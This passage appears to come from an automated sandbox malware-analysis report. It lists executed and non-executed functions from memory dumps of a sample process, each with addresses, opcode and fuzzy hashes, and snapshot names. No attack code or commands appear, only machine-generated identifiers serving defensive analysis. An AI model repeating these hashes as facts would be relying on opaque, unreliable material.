                                                                                                                    • Instruction Fuzzy Hash: C6F0303090E7D18FE367973588A40617FB0DF1720171904EFC199CA5A3E96E9886D752
                                                                                                                    Function 00007FFD3456393E Relevance: .0, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0fa61e1bc2d34c25b291fb6c8e3c7e53dd1c83a71e6d7df43dcb9f134149b047
                                                                                                                    • Instruction ID: 90851bd60e6674cc9f421617cbf7425d049d199c3d12c1ca61b2ee90d0651e7c
                                                                                                                    • Opcode Fuzzy Hash: 0fa61e1bc2d34c25b291fb6c8e3c7e53dd1c83a71e6d7df43dcb9f134149b047
                                                                                                                    • Instruction Fuzzy Hash: 4DF01C31E0C0064BFB959644C4A0BBA33A5DF56320F181079DA4ED32C1DD2CA9419709
                                                                                                                    Function 00007FFD345799FA Relevance: .0, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34570000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3d4160f7d7d45aa6afc0f65b8701cdcb5325b32ebcc20e93dbe3175103bd4169
                                                                                                                    • Instruction ID: 5fe61b2fd74f5c4edb89fdd7b7305db599876668cb0338d510344d5334f49575
                                                                                                                    • Opcode Fuzzy Hash: 3d4160f7d7d45aa6afc0f65b8701cdcb5325b32ebcc20e93dbe3175103bd4169
                                                                                                                    • Instruction Fuzzy Hash: 03F0A031E0C51D8FEB91EF04C890BA933A2EB05310F6182B6D90CD72D2DE3CAE009B80
                                                                                                                    Function 00007FFD34573F20 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34570000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                    • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                                                    • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                    • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                                                    Function 00007FFD34A8D993 Relevance: .0, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4624064971.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34a80000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e86d414d2f8e8ca4df34839a1f01bd622a592f7c0d2adc501cbe5ee363396f5d
                                                                                                                    • Instruction ID: 54a724a70d1faf30532358acdd5f61b431582de27428755bc0e426055d58c3f2
                                                                                                                    • Opcode Fuzzy Hash: e86d414d2f8e8ca4df34839a1f01bd622a592f7c0d2adc501cbe5ee363396f5d
                                                                                                                    • Instruction Fuzzy Hash: D0D01283F4C92296F3D4044D79D10B87FC0D7955B97740573E699C55C9D84EA9833250
                                                                                                                    Function 00007FFD34560B95 Relevance: .0, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1655bf586bd510a0444da9578f040976055379fdba1b0be01a33af2343bf41be
                                                                                                                    • Instruction ID: 97261e78cb310111d530b83f7af1a2dd14e57a6d62dddd683722aa4715897ae2
                                                                                                                    • Opcode Fuzzy Hash: 1655bf586bd510a0444da9578f040976055379fdba1b0be01a33af2343bf41be
                                                                                                                    • Instruction Fuzzy Hash: ABD0A73066954A4FDA01B73CC8898547BA0EB0F224BD510F1D009C7561D50D4C558B00
                                                                                                                    Function 00007FFD34A81880 Relevance: .0, Instructions: 18COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4624064971.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34a80000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                    Function 00007FFD34A830D3 Relevance: .0, Instructions: 18COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4624064971.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34a80000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 39a366a7b5212ebd01759c49391c41dd47aa652968bb62c4f5d2a0816c893a64
                                                                                                                    • Instruction ID: 9945082a4fc84364a68ce1a25450568c322472425437998034ff2de8e5c0a64e
                                                                                                                    • Opcode Fuzzy Hash: 39a366a7b5212ebd01759c49391c41dd47aa652968bb62c4f5d2a0816c893a64
                                                                                                                    • Instruction Fuzzy Hash: 90D01234608B448BC219D908D4D097573D1EB55305F105528D1DBC3256CD24F8468685
                                                                                                                    Function 00007FFD34952857 Relevance: .0, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a7a0fd8e5abe64ffbb55a96c94ab5951adce80b5f4e221969a5efb65000c1620
                                                                                                                    • Instruction ID: 8d8bff5a5e5ef17c2237cd9582e011ead4c9b14370554916ba6cb634b409b7ef
                                                                                                                    • Opcode Fuzzy Hash: a7a0fd8e5abe64ffbb55a96c94ab5951adce80b5f4e221969a5efb65000c1620
                                                                                                                    • Instruction Fuzzy Hash: 97D05E42F0D7824BEB3A016408F11A80D809F2738072A04FAD35ACE2EBE98C68056B32
                                                                                                                    Function 00007FFD34560CBF Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 623355c4c761995da0b65237a2ec80d23bbe5063140a0c10700039931d7a4e64
                                                                                                                    • Instruction ID: 742d2502906de8fc2a2c6c1b05cb9bbd5b5e2fb4d8f3e1f54805611e23c2c237
                                                                                                                    • Opcode Fuzzy Hash: 623355c4c761995da0b65237a2ec80d23bbe5063140a0c10700039931d7a4e64
                                                                                                                    • Instruction Fuzzy Hash: C9E01735F0960ACBFB01EB54C4D46AEB7A1EB52721F1082B5C501C7289DB7CA684EA80
                                                                                                                    Function 00007FFD345606A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                                                                                                    • Instruction ID: de2ea020ad61640ef8e40a0b67cdc873ade2ef5fac3099df56b1d3f84cd23727
                                                                                                                    • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                                                                                                    • Instruction Fuzzy Hash: BFC04C06F5E51F01B417B56E54E60ACB2415BD7A70FD52172D70CD10C19D8D20D5A156
                                                                                                                    Function 00007FFD34560B18 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 976be7f8def78b83ca5f031f87b57cc84e2e52635fdbd6518493c78f056b750e
                                                                                                                    • Instruction ID: 21a5a99be99967fa41ac57dd4af91fe4d88051023b8008d54d5f6399e21116a9
                                                                                                                    • Opcode Fuzzy Hash: 976be7f8def78b83ca5f031f87b57cc84e2e52635fdbd6518493c78f056b750e
                                                                                                                    • Instruction Fuzzy Hash: D6C08C309108088FC940E72EC88480032A0FB0E220BC100D0E00DC7170E21E9CC4CB00
                                                                                                                    Function 00007FFD345612E0 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                                                                                    • Instruction ID: a50990506d9201a2f15d54500c1484066e0405552ff1ffe2eb2556d764c299cd
                                                                                                                    • Opcode Fuzzy Hash: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                                                                                    • Instruction Fuzzy Hash: 88C04C34A518098FCA48EB69C89591477A0FB1A215BD61190E409C7271E65DDCD5D741
                                                                                                                    Function 00007FFD349586EB Relevance: .0, Instructions: 11COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3cca35076f2ca850bc219725a7a6ac76ee1cff21213c2fdf1b7e35ffc0cb905c
                                                                                                                    • Instruction ID: 98699523da72ce2c94d24a8d381068bd610586208b036059286f63a408483cf1
                                                                                                                    • Opcode Fuzzy Hash: 3cca35076f2ca850bc219725a7a6ac76ee1cff21213c2fdf1b7e35ffc0cb905c
                                                                                                                    • Instruction Fuzzy Hash: E3D09214B1D55F85F679860241B023D25A15F42300EB004FEC29FC18C9C91DB9217722
                                                                                                                    Function 00007FFD3495333B Relevance: .0, Instructions: 11COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 806bd5350af2c5d9d8229089b3c936f36bad06961f7b08ab37019a01ed309f53
                                                                                                                    • Instruction ID: 3b3165b16412febe614d8c966c7c2bb598044534f0f889ae6ea1c593ca011f94
                                                                                                                    • Opcode Fuzzy Hash: 806bd5350af2c5d9d8229089b3c936f36bad06961f7b08ab37019a01ed309f53
                                                                                                                    • Instruction Fuzzy Hash: 9BD0C914B0C60385F53A560641F023E63905F0BB00EB450BDC39FC1CD9CD2DB8027622
                                                                                                                    Function 00007FFD3495AFC0 Relevance: .0, Instructions: 11COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7164194e321ff11a9c5b58660fdeb581821e2c8107603c55c42c51c06a3cb97c
                                                                                                                    • Instruction ID: 446dc2cdf3385261861c0994a07543551bc292da366fefb59afa80444266e8e6
                                                                                                                    • Opcode Fuzzy Hash: 7164194e321ff11a9c5b58660fdeb581821e2c8107603c55c42c51c06a3cb97c
                                                                                                                    • Instruction Fuzzy Hash: F5C002207588559FD698DB09C0E9A3872D1EF4A301FA040B8E54ACB2A9C92CA845A620
                                                                                                                    Function 00007FFD345659C7 Relevance: .0, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: be55222d62812793089b4d9ae221bd1b59d3d020677999fefdfbd6630d1eed8f
                                                                                                                    • Instruction ID: e89131ced93b6e75b83c2327753c1158d014309e8f14d425a3756a2cdc90dfe2
                                                                                                                    • Opcode Fuzzy Hash: be55222d62812793089b4d9ae221bd1b59d3d020677999fefdfbd6630d1eed8f
                                                                                                                    • Instruction Fuzzy Hash: AFC08C01F0C85B02F12A2384403127D84026B40304F800074E00DD62C6CC5C9F0243C6
                                                                                                                    Function 00007FFD349586FE Relevance: .0, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0a76bd5a74ab1f8a1098f3c579cdb005e5067301a7bcccf30f519f858386f14f
                                                                                                                    • Instruction ID: 66b53eef698f94282e20b3a875eea175335099fbb4d83cd0c5d832e15c4d7898
                                                                                                                    • Opcode Fuzzy Hash: 0a76bd5a74ab1f8a1098f3c579cdb005e5067301a7bcccf30f519f858386f14f
                                                                                                                    • Instruction Fuzzy Hash: 26C08C20E0C20B8FF226871180B12393B619F43340F7040FEC54ECA4EACE2C3A21B722
                                                                                                                    Function 00007FFD3495334E Relevance: .0, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 55cc0f958a01d8764d0302be527d63ca8d49c3b2f5153660c1605ae2fd82be13
                                                                                                                    • Instruction ID: 9219fdcd3e2cf3b92ec129ea036fcea4747eb9a4b71bb52aadd1c0a0cdd48018
                                                                                                                    • Opcode Fuzzy Hash: 55cc0f958a01d8764d0302be527d63ca8d49c3b2f5153660c1605ae2fd82be13
                                                                                                                    • Instruction Fuzzy Hash: CDC08C20A0C2038FF226931580B123637609F0B780F3080FDC64ECA8EACD2CB902B722
                                                                                                                    Function 00007FFD345606C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction ID: b3c5cdccc0aa1ee8565224c2d76708e0fed1863bf9f8249f2238a3161b01cd25
                                                                                                                    • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction Fuzzy Hash: 88B01200D6640F00A40A357A08D20A470405B46120FC02070D60CC1081988D10942242
                                                                                                                    Function 00007FFD34957C2A Relevance: .0, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bfb44ebc6fdf36d7ea19c209bdb1e86770482ece3614c54f6f25e2213c05665e
                                                                                                                    • Instruction ID: a5aebb02cd1855248427fb4164070f8448e09bc910ddfee5cb332e27c36b1e67
                                                                                                                    • Opcode Fuzzy Hash: bfb44ebc6fdf36d7ea19c209bdb1e86770482ece3614c54f6f25e2213c05665e
                                                                                                                    • Instruction Fuzzy Hash: 9DC04840F0D3575AE66615B008B403824A10F07291BA609FAD35ACA2E7EC8C6D8962B5

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD34570622 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34570000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: L_^$$L_^%$L_^1$L_^9$L_^:$^+=$#<L
                                                                                                                    • API String ID: 0-4271824446
                                                                                                                    • Opcode ID: b34310fa1fc0c123ab2ee53f33e57d96bf9007b256c182c9725413568574c979
                                                                                                                    • Instruction ID: 362b89c93282e4a0fc2b586642626d1c8581a31cd0c0734f6ce42700a835332e
                                                                                                                    • Opcode Fuzzy Hash: b34310fa1fc0c123ab2ee53f33e57d96bf9007b256c182c9725413568574c979
                                                                                                                    • Instruction Fuzzy Hash: C571E917B0C5222AD92977ED78620FF7748DF91379B184677E28CA90A34D18F8C245D6
                                                                                                                    Function 00007FFD345706D3 Relevance: 9.0, Strings: 7, Instructions: 225COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34570000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: L_^$$L_^%$L_^1$L_^9$L_^:$^+=$#<L
                                                                                                                    • API String ID: 0-4271824446
                                                                                                                    • Opcode ID: 230673a9c5e27a90f079f00ef638b592d3d03742240a7f1810d7f83d4348c3ca
                                                                                                                    • Instruction ID: d77be82bacd0cfb6302ea27809dde9b24e51198c4de67680d41ce0311e0b4110
                                                                                                                    • Opcode Fuzzy Hash: 230673a9c5e27a90f079f00ef638b592d3d03742240a7f1810d7f83d4348c3ca
                                                                                                                    • Instruction Fuzzy Hash: 73517557F0C52626E92937EC38A60FF6748DFA1379B189677E24DA80A34D1CECC241D9
                                                                                                                    Function 00007FFD345706FA Relevance: 9.0, Strings: 7, Instructions: 215COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34570000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: =L_^$L_^+$L_^1$L_^9$L_^:$^+=$#<L
                                                                                                                    • API String ID: 0-1802454848
                                                                                                                    • Opcode ID: 915d380f74688abbd3bd571c83459c687468c841d5a0e5921064095303701577
                                                                                                                    • Instruction ID: 8e5d385fb794a36892cc1e09d1c1497468d0cf48f766087935c672a262fa8820
                                                                                                                    • Opcode Fuzzy Hash: 915d380f74688abbd3bd571c83459c687468c841d5a0e5921064095303701577
                                                                                                                    • Instruction Fuzzy Hash: 9D516D17B0C52626E92937FD38A60FF6708DFA1379B089677E20DA80A34D1CEC8241D9

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD34560D48 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5Y_H
                                                                                                                    • API String ID: 0-3237497481
                                                                                                                    • Opcode ID: 7cdad48d862a893f49830c950a675f79a52fc0858645b841325c59409642340d
                                                                                                                    • Instruction ID: 7f069677219a3a553fa683c2935bc70bb6d8bae6629b5707489e194a670af7f5
                                                                                                                    • Opcode Fuzzy Hash: 7cdad48d862a893f49830c950a675f79a52fc0858645b841325c59409642340d
                                                                                                                    • Instruction Fuzzy Hash: 3281E572A1CA8A4FE79ADB6888657E9BFE1FB56710F4401BAD048D72D2DF7C5804C700
                                                                                                                    Function 00007FFD34560998 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 87a4
                                                                                                                    • API String ID: 0-1756189204
                                                                                                                    • Opcode ID: b2e738a06c9d9921ee239ad7e5fecb95478410be6e51c02a858c371ae4ef75ab
                                                                                                                    • Instruction ID: 818f46390e38e40795060a024f3bed51fbb1c5008beefadabe21148043cc9329
                                                                                                                    • Opcode Fuzzy Hash: b2e738a06c9d9921ee239ad7e5fecb95478410be6e51c02a858c371ae4ef75ab
                                                                                                                    • Instruction Fuzzy Hash: A521F621F1C9190FF758F76C90AA67576D6EB9A331F5005B9E50DC32E3DD2CAC418681
                                                                                                                    Function 00007FFD34560E43 Relevance: .1, Instructions: 145COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f0dce7c9f6ef5fbe29881915be5e7fd705562e82539477b15f29e554268e2948
                                                                                                                    • Instruction ID: dd15bf75795caa546e9ea66abc490a4521167095b4bf32d86410a627f9440110
                                                                                                                    • Opcode Fuzzy Hash: f0dce7c9f6ef5fbe29881915be5e7fd705562e82539477b15f29e554268e2948
                                                                                                                    • Instruction Fuzzy Hash: D241C472A1CA8E8BE799DB5C88657E9BFE1FB96324F4002AAD049D73D1CE7D1815C700
                                                                                                                    Function 00007FFD34560908 Relevance: .1, Instructions: 118COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 70b39af699e79c17fd18832147968019b6e7dd1b1b2a1a1ad00ae19ae8ffb0f7
                                                                                                                    • Instruction ID: 05a90d4d70d8b2052adf006a9099d1ea44fe35d62e3abbf4947dfb527d74df3a
                                                                                                                    • Opcode Fuzzy Hash: 70b39af699e79c17fd18832147968019b6e7dd1b1b2a1a1ad00ae19ae8ffb0f7
